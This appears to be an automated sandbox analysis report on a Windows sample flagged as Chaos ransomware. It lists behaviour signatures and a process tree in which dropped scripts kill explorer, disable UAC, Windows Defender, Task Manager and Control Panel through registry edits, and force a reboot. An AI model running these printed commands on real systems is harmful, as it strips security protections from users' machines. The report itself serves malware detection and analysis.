Analysis

  • max time kernel
    283s
  • max time network
    277s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-06-2024 01:47

General

  • Target

    7z2406-x64.exe

  • Size

    1.5MB

  • MD5

    d8af785ca5752bae36e8af5a2f912d81

  • SHA1

    54da15671ad8a765f3213912cba8ebd8dac1f254

  • SHA256

    6220bbe6c26d87fc343e0ffa4e20ccfafeca7dab2742e41963c40b56fb884807

  • SHA512

    b635b449f49aac29234f677e662be35f72a059401ea0786d956485d07134f9dd10ed284338503f08ff7aad16833cf034eb955ca34e1faf35a8177ccad1f20c75

  • SSDEEP

    49152:6E+lvaQr7omhpcibOw1eLmz6O92u3RtRj08+Z3bG:6EzQ3/hdSzLVO92uTRmZy

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • UAC bypass 3 TTPs 3 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 44 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Registers COM server for autorun 1 TTPs 3 IoCs
  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 34 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 40 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 59 IoCs
  • Modifies registry key 1 TTPs 10 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe
    "C:\Users\Admin\AppData\Local\Temp\7z2406-x64.exe"
    1⤵
    • Registers COM server for autorun
    • Drops file in Program Files directory
    • Modifies registry class
    PID:5116
  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe"
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:3544
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff8c0eab58,0x7fff8c0eab68,0x7fff8c0eab78
      2⤵
        PID:316
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:2
        2⤵
          PID:3124
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
          2⤵
            PID:4136
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2200 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
            2⤵
              PID:1092
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2912 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:1
              2⤵
                PID:4372
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:1
                2⤵
                  PID:4356
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4320 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:1
                  2⤵
                    PID:4012
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4464 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                    2⤵
                      PID:1960
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3936 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                      2⤵
                        PID:4600
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4816 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                        2⤵
                          PID:2648
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                          2⤵
                            PID:952
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5012 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                            2⤵
                              PID:3996
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4764 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:1
                              2⤵
                                PID:1280
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3248 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:1
                                2⤵
                                  PID:2068
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3372 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                  2⤵
                                    PID:4584
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3496 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                    2⤵
                                      PID:3696
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5304 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                      2⤵
                                        PID:2408
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                        2⤵
                                          PID:3684
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5176 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                          2⤵
                                            PID:3464
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5020 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                            2⤵
                                              PID:3420
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                              2⤵
                                                PID:1668
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3376 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:2
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:2652
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=1248 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:1
                                                2⤵
                                                  PID:4132
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=1132 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:1
                                                  2⤵
                                                    PID:1836
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1060 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                                    2⤵
                                                      PID:2640
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3288 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                                      2⤵
                                                        PID:2976
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5356 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                                        2⤵
                                                          PID:3536
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5168 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                                          2⤵
                                                            PID:2628
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3948 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                                            2⤵
                                                              PID:1972
                                                            • C:\Users\Admin\Downloads\ScaryInstaller.exe
                                                              "C:\Users\Admin\Downloads\ScaryInstaller.exe"
                                                              2⤵
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              PID:4628
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7A04.tmp\creep.cmd" "
                                                                3⤵
                                                                • Checks computer location settings
                                                                • Modifies registry class
                                                                PID:5088
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im explorer.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  PID:3652
                                                                • C:\Users\Admin\AppData\Local\Temp\7A04.tmp\CreepScreen.exe
                                                                  CreepScreen.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:2504
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout 5 /nobreak
                                                                  4⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:640
                                                                • C:\Users\Admin\AppData\Local\Temp\7A04.tmp\melter.exe
                                                                  melter.exe
                                                                  4⤵
                                                                  • Executes dropped EXE
                                                                  PID:5024
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout 10 /nobreak
                                                                  4⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:4008
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im CreepScreen.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  PID:1880
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im melter.exe
                                                                  4⤵
                                                                  • Kills process with taskkill
                                                                  PID:4036
                                                                • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                  "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\7A04.tmp\scarr.mp4"
                                                                  4⤵
                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  • Suspicious use of SetWindowsHookEx
                                                                  PID:836
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\bg.bmp /f
                                                                  4⤵
                                                                  • Sets desktop wallpaper using registry
                                                                  PID:1708
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
                                                                  4⤵
                                                                    PID:3940
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
                                                                    4⤵
                                                                    • Modifies registry key
                                                                    PID:3472
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                                    4⤵
                                                                    • UAC bypass
                                                                    • Modifies registry key
                                                                    PID:2068
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                                                                    4⤵
                                                                      PID:2168
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                                      4⤵
                                                                      • Modifies registry key
                                                                      PID:2016
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
                                                                      4⤵
                                                                        PID:3968
                                                                      • C:\Windows\SysWOW64\net.exe
                                                                        net user Admin /fullname:"IT'S TOO LATE!!!"
                                                                        4⤵
                                                                          PID:4544
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 user Admin /fullname:"IT'S TOO LATE!!!"
                                                                            5⤵
                                                                              PID:408
                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                            timeout 8 /nobreak
                                                                            4⤵
                                                                            • Delays execution with timeout.exe
                                                                            PID:4188
                                                                          • C:\Windows\SysWOW64\shutdown.exe
                                                                            shutdown /r /t 5 /c "I CATCH YOU AND EAT YOUR FACE!!!"
                                                                            4⤵
                                                                              PID:1628
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5440 --field-trial-handle=1804,i,16476290157876947418,1144201197249670142,131072 /prefetch:8
                                                                          2⤵
                                                                            PID:436
                                                                        • C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
                                                                          "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
                                                                          1⤵
                                                                            PID:3956
                                                                          • C:\Windows\System32\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                            1⤵
                                                                              PID:3884
                                                                            • C:\Users\Admin\Downloads\GuideLauncher.exe
                                                                              "C:\Users\Admin\Downloads\GuideLauncher.exe"
                                                                              1⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              PID:4860
                                                                              • C:\Windows\system32\cmd.exe
                                                                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\DCA0.tmp\DCA1.bat C:\Users\Admin\Downloads\GuideLauncher.exe"
                                                                                2⤵
                                                                                  PID:3152
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3396
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3376
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:1168
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3092
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4992
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3056
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:336
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3708
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3232
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4460
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3016
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2148
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:1220
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4324
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:336
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4956
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:1612
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3932
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:5064
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2224
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4720
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1672
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4484
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4028
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4148
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1880
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:1972
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3728
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4128
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3480
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3596
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4408
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:408
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2828
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:1420
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3676
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3956
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:2052
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:4828
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:3368
                                                                                  • C:\Windows\system32\timeout.exe
                                                                                    timeout 5 /nobreak
                                                                                    3⤵
                                                                                    • Delays execution with timeout.exe
                                                                                    PID:3740
                                                                                  • C:\Users\Admin\AppData\Local\Temp\DC9F.tmp\rundll86.exe
                                                                                    rundll86.exe
                                                                                    3⤵
                                                                                    • Executes dropped EXE
